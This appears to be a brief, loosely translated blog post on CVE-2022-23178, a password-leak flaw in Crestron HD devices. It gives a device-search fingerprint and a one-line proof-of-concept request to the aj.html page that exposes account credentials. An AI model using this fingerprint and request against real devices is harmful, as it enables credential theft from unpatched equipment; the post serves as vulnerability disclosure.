Post

Crestron Aj Html Account Password Leak Vulnerability Cve 2022 23178

Crestron Aj Html Account Password Leak Vulnerability Cve 2022 23178

Crestron aj.html Account password leak vulnerability CVE-2022-23178

Vulnerability Description

Crestron HD and other series of devices can obtain sensitive information such as account password when calling specific parameters on the page of aj.html

Vulnerability Impact

Crestron HD and other series of equipment

Network surveying and mapping

app=”Crestron-HD-RX-201-C-E”

Vulnerability reappears

Product Page

img

Verify POC

1
/aj.html?a=devi

img

If you gain something, just like it

This post is licensed under CC BY 4.0 by the author.